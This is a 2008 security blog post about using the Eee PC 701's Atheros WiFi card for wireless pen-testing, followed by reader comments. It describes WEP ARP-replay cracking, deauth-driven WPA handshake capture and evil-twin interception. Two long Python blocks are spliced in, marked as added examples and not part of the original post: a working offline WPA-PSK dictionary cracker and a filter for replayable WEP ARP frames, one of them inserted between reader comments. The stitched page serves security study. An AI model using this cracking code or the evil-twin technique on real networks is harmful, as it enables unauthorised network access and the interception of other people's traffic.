Monday, September 15, 2008

The Perfect NetBook: Eee 701 2G Surf

The Register has a review of netbooks (mini notebook computers).

For security professionals, the best netbook I've found is the original one, the Eee PC 701 (a.k.a. the Eee PC 2G Surf). Two things make it perfect: the Atheros WiFi card inside it and the $250 price tag.

WiFi hacking/pen-testing requires a card that can both receive packets in monitor mode and send (inject) raw packets.

WiFi was designed with the idea that the chip should include its own low-power microprocessor to take care of all the management traffic, so that the host machine can sleep and save power. The consequence is that the host is typically unable to see raw packets or to send raw packets of its own.

Atheros designed its chips to be more open, leaving more of the protocol to the host driver. The "madwifi" project was able to create Linux drivers for Atheros chips that allow full control over packets.

Other chips allow a subset of these abilities. Several support "monitor mode" for receiving packets. Few, though, allow sending every type of packet: the firmware will overwrite the sequence numbers, for example, or prevent fragmentation, and some will refuse to send corrupt packets at all.

When doing WiFi fuzzing, you need to be able to craft every type of packet, including corrupt packets (indeed, that's the point of fuzzing: to see how a system handles corrupt packets).

The easiest method for WEP cracking is to capture an encrypted ARP request (you can't read it through the encryption, but it is identified by its size and broadcast destination address) and replay it over and over; the network answers each replay with freshly encrypted packets, each carrying a new IV. After about 40,000 such packets, 128-bit WEP can be cracked in just a few seconds. I cracked my home WEP test network in about 15 minutes.

For cracking WPA with a pre-shared key, you need to be able to send deauth packets to force stations to re-authenticate. You then capture the four-way handshake that follows and hope the network uses an easily guessable passphrase, which can then be dictionary-cracked offline.
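The handshake-then-dictionary step, as an added worked example (it is not the post's code nor aircrack-ng's or cowpatty's): message 1 of the handshake carries the AP's ANonce, message 2 carries the station's SNonce plus a MIC keyed from the passphrase, so each candidate passphrase is tested by recomputing that MIC and comparing. The SSID, MAC addresses, nonces, wordlist and the "true" passphrase are all constructed here so the example runs offline; with a real capture the two EAPOL-Key frames come out of airodump-ng's pcap.

```python
"""Offline WPA/WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example for this post (not the post's or aircrack-ng's code); standard
library only. The handshake below is CONSTRUCTED from a known passphrase so
the example runs offline; a real attack takes message 1 (ANonce) and message 2
(SNonce + MIC) from the capture file.
"""
import hashlib
import hmac

MIC_OFF, MIC_LEN = 81, 16        # Key MIC field inside an EAPOL-Key frame
NONCE_OFF, NONCE_LEN = 17, 32    # Key Nonce field


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes) (802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC over the whole EAPOL frame with the MIC field zeroed; KCK = PTK[0:16].
    Key Information bits 0-2 select HMAC-MD5 (1, TKIP) or HMAC-SHA1-128 (2, CCMP)."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    zeroed = eapol[:MIC_OFF] + b"\x00" * MIC_LEN + eapol[MIC_OFF + MIC_LEN:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def handshake_message_number(eapol: bytes) -> int:
    """Classify an EAPOL-Key frame as handshake message 1..4 from its Ack/MIC/Secure flags."""
    info = int.from_bytes(eapol[5:7], "big")
    ack, mic, secure = info & 0x80, info & 0x100, info & 0x200
    if ack and not mic:
        return 1
    if mic and not ack and not secure:
        return 2
    if ack and mic:
        return 3
    return 4


def build_eapol_key(key_info: int, nonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key frame: 802.1X header + 95-byte RSN key descriptor, no key data."""
    body = (b"\x02" +                         # descriptor type: RSN Key
            key_info.to_bytes(2, "big") +
            (16).to_bytes(2, "big") +         # key length (CCMP)
            (1).to_bytes(8, "big") +          # replay counter
            nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 +   # nonce, key IV, RSC, key ID
            mic + (0).to_bytes(2, "big"))     # MIC, key data length = 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body     # 802.1X v1, type EAPOL-Key


def crack_psk(ssid, ap_mac, sta_mac, msg1, msg2, wordlist):
    """Dictionary attack: recompute the message-2 MIC for each candidate passphrase."""
    anonce = msg1[NONCE_OFF:NONCE_OFF + NONCE_LEN]
    snonce = msg2[NONCE_OFF:NONCE_OFF + NONCE_LEN]
    target = msg2[MIC_OFF:MIC_OFF + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return candidate
    return None


# --- Constructed handshake (stands in for the captured frames) ---------------
SSID = "testnet"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("001122ccddee")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "letmein1"
WORDLIST = ["password", "12345678", "letmein1", "correcthorse"]


def constructed_handshake():
    """Message 1 and a correctly MIC'd message 2, as a station holding TRUE_PASSPHRASE would send."""
    msg1 = build_eapol_key(0x008a, ANONCE)    # Ack | Pairwise | version 2 (CCMP)
    msg2 = build_eapol_key(0x010a, SNONCE)    # MIC | Pairwise | version 2, MIC still zero
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return msg1, build_eapol_key(0x010a, SNONCE, eapol_mic(kck, msg2))


if __name__ == "__main__":
    m1, m2 = constructed_handshake()
    print("handshake messages:", handshake_message_number(m1), handshake_message_number(m2))
    print("recovered passphrase:", crack_psk(SSID, AP_MAC, STA_MAC, m1, m2, WORDLIST))
```

The 4096 PBKDF2 rounds per candidate (salted with the SSID, so nothing is shared across networks) are the whole cost of the attack, which is why it only works against a passphrase that appears in a wordlist and why a long random pre-shared key defeats it.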

The best thing about the Atheros chipset is that full access-point software exists for it, so you can set up the Eee PC as a complete access point. For pen-testing, you can also set it up as an "evil twin", so that users connect to your access point instead of their intended one, which lets you intercept their traffic as they surf the Internet.

The newer Eee PC models use Ralink chips for 802.11n. Right now, there are no drivers for either monitor mode or injection on these chips. (Note that the Wikipedia article on the Eee PC claims that all models use Atheros WiFi chips; this is wrong.) You can, however, buy a $33 mini-PCI card and replace the WiFi if you want.

Another important feature is the SD slot on the Eee PC. At NewEgg, 4GB cards are $10 and 16GB cards $40. It's pretty easy to install the BackTrack distro on one and boot from it. You could replace the existing OS, but I'm too lazy and boot distros like BackTrack and Knoppix from SD cards.

6 comments:

Andre Gironda said...

The only problem is that you also need another card to establish limited connectivity if there are zero clients currently on the AP under attack. Although I guess any USB card or another laptop would work for this purpose. The ARP reinjection attacks for WEP cracking otherwise won't work, as you'll never find a 68-byte packet from a client radio that is tods=1, BSSID set to the AP under attack, and dest MAC set to broadcast.

Then, there's the additional problem if you want to crack WEP while doing an evil twin, but that's probably a very rare situation.

I suggest the Aircrack-ng GUI under Windows. Call me a sucker for liking anything Windows -- but this is going to bring WEP cracking to a lot more people. It appears to switch between PTW and regular attacks depending on how many packets you have -- and almost all configuration flags are accessible from an advanced menu. I can always boot to Linux if I need to with BT3, WiFiSlax, or WiFiWay.

The PICO E-12LX would work nicely for WPA cracking, even under Windows with oc-v0.4-win's cowpatty (or for btpincrack). That's why I roll an older X-series Thinkpad. I've got access to the internal WiFi for limited connecting (i.e. causing encrypted arps on an otherwise dormant AP). I've got access to PCMCIA for an Atheros chipset card. I've got access to CF for the E12LX. I use a USB BT device, but I prefer these to built-in support.
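The size-and-address test that both the post ("identified by their size and broadcast address") and the comment above (68 bytes, tods=1, BSSID of the target, broadcast destination) describe, as an added example in Python; it is not the post's, the commenter's, or aireplay-ng's code. The sample frames, MAC addresses and BSSID are constructed so it runs offline, and it goes slightly beyond the text by also accepting the 70-byte QoS-header form of the same frame.

```python
"""Filter for replayable WEP-encrypted ARP requests in raw 802.11 frames.

Added example for this post and for the comment describing the 68-byte frame;
not the post's or aireplay-ng's code. Frames below are CONSTRUCTED; a real run
reads frames captured on a monitor-mode interface. The ARP itself is
unreadable under WEP, so the filter works from size and addressing alone:
Data frame, Protected bit set, ToDS=1/FromDS=0 (station -> AP), BSSID of the
target AP, broadcast destination, and a 44-byte encrypted body
(4 IV/KeyID + 8 LLC/SNAP + 28 ARP + 4 ICV): 68 bytes with a plain 24-byte
header, 70 with a QoS header. WEP has no replay protection, so such a frame
can be re-injected unchanged and the AP rebroadcasts it under a fresh IV.
"""
from dataclasses import dataclass

BROADCAST = b"\xff" * 6
ENCRYPTED_ARP_BODY = 4 + 8 + 28 + 4   # IV/KeyID + LLC/SNAP + ARP + ICV = 44
TYPE_DATA = 2
SUBTYPE_QOS_BIT = 0x8                 # data subtypes 8-15 carry a 2-byte QoS Control field


@dataclass
class Frame:
    ftype: int
    subtype: int
    to_ds: bool
    from_ds: bool
    protected: bool
    addr1: bytes
    addr2: bytes
    addr3: bytes
    body: bytes


def parse_frame(raw: bytes) -> Frame:
    """Decode the 802.11 MAC header (FCS already stripped, as radiotap captures usually are)."""
    if len(raw) < 24:
        raise ValueError("frame shorter than a basic 802.11 header")
    fc, flags = raw[0], raw[1]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    to_ds, from_ds = bool(flags & 0x01), bool(flags & 0x02)
    hdr_len = 24
    if to_ds and from_ds:
        hdr_len += 6                  # Address 4 present on WDS frames
    if ftype == TYPE_DATA and subtype & SUBTYPE_QOS_BIT:
        hdr_len += 2                  # QoS Control
    if len(raw) < hdr_len:
        raise ValueError("truncated header")
    return Frame(ftype, subtype, to_ds, from_ds, bool(flags & 0x40),
                 raw[4:10], raw[10:16], raw[16:22], raw[hdr_len:])


def is_replayable_arp(f: Frame, bssid: bytes) -> bool:
    """True for a station->AP, WEP-protected, broadcast frame whose body is ARP-sized.
    With ToDS=1/FromDS=0 the header reads Addr1=BSSID, Addr2=SA, Addr3=DA."""
    return (f.ftype == TYPE_DATA and f.protected
            and f.to_ds and not f.from_ds
            and f.addr1 == bssid
            and f.addr3 == BROADCAST
            and len(f.body) == ENCRYPTED_ARP_BODY)


def find_replay_candidates(frames, bssid: bytes):
    """Indexes of frames an ARP-replay attack could re-inject against this BSSID."""
    return [i for i, raw in enumerate(frames) if is_replayable_arp(parse_frame(raw), bssid)]


# --- Constructed sample frames -----------------------------------------------
def data_frame(addr1, addr2, addr3, body, to_ds=False, from_ds=False, protected=True, qos=False):
    fc0 = (TYPE_DATA << 2) | ((SUBTYPE_QOS_BIT if qos else 0) << 4)
    flags = (0x01 if to_ds else 0) | (0x02 if from_ds else 0) | (0x40 if protected else 0)
    qos_ctl = b"\x00\x00" if qos else b""
    return bytes([fc0, flags]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x10\x00" + qos_ctl + body


BSSID = bytes.fromhex("00aabbccddee")
STA = bytes.fromhex("001122334455")
OTHER_AP = bytes.fromhex("00de4dbeef00")
ARP_BODY = b"\x00" * ENCRYPTED_ARP_BODY     # ciphertext stands in for IV+LLC+ARP+ICV

SAMPLE_FRAMES = [
    data_frame(BSSID, STA, BROADCAST, ARP_BODY, to_ds=True),                 # 0: 68-byte ARP request -> replay
    data_frame(BSSID, STA, BROADCAST, ARP_BODY, to_ds=True, qos=True),       # 1: same with QoS header (70 bytes)
    data_frame(BROADCAST, BSSID, STA, ARP_BODY, from_ds=True),               # 2: AP's own rebroadcast, wrong direction
    data_frame(OTHER_AP, STA, BROADCAST, ARP_BODY, to_ds=True),              # 3: another network
    data_frame(BSSID, STA, bytes.fromhex("00aabbccdd01"), ARP_BODY, to_ds=True),  # 4: unicast, not ARP request
    data_frame(BSSID, STA, BROADCAST, b"\x00" * 300, to_ds=True),            # 5: broadcast but too big (e.g. DHCP)
    data_frame(BSSID, STA, BROADCAST, ARP_BODY, to_ds=True, protected=False),  # 6: open network, nothing to crack
    b"\x80\x00" + b"\x00\x00" + BROADCAST + BSSID + BSSID + b"\x00\x00" + b"\x00" * 40,  # 7: beacon
]

if __name__ == "__main__":
    print("frame lengths:", [len(f) for f in SAMPLE_FRAMES])
    print("replay candidates:", find_replay_candidates(SAMPLE_FRAMES, BSSID))
```

The filter is deliberately blind to content: everything after the header is ciphertext, so a 44-byte protected broadcast body from a station is the only fingerprint available, and that is also why the attack needs at least one associated client to produce such a frame.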

Robert Graham said...

"The arp reinjection attacks for WEP cracking otherwise won't work, as you'll never find a 68-byte packet from a client-radio that is tods=1, BSSID set to AP under attack, and dest-mac set to broadcast."

Hmmm, seems to work just fine for me when I cracked my home network.

I had airodump-ng running in one window. I had aireplay-ng --arpreplay running in a second window. I ran aireplay-ng --deauth in a third window to disassociate a client, forcing it to reassociate and generate an ARP. All of this seemed to work fine from only the built-in Atheros card.

I had airodump-ng running in one window on ath2, then aireplay-ng -arpinject

Andre Gironda said...

"... to disassociate a client, forcing it to reassociate and generate an ARP. All of this seem to work fine from only the built-in Atheros card"

This, like I said, assumes that another client is available! Let's say it's just your Atheros in monitor / reinj mode and the AP. Then what do you do?

For those using Cowpatty, you might want to check out this new tool as well
http://code.google.com/p/pyrit/

devilok said...

FWIW, you can pick up an Acer Aspire One for $329. It's significantly more powerful, and runs the Atheros AR5006EG chipset, which is supported under madwifi (http://madwifi.org/ticket/859).

Marc-Andre said...

I was curious what kind of laptops you guys use. I saw a couple of pictures with you two in them and wondered about the models of the ultraportables.

thanks

JibJab said...

Andre, don't you know about the -p 0841 attack? Read up http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

how annoying that I have to sign up to google to leave a comment.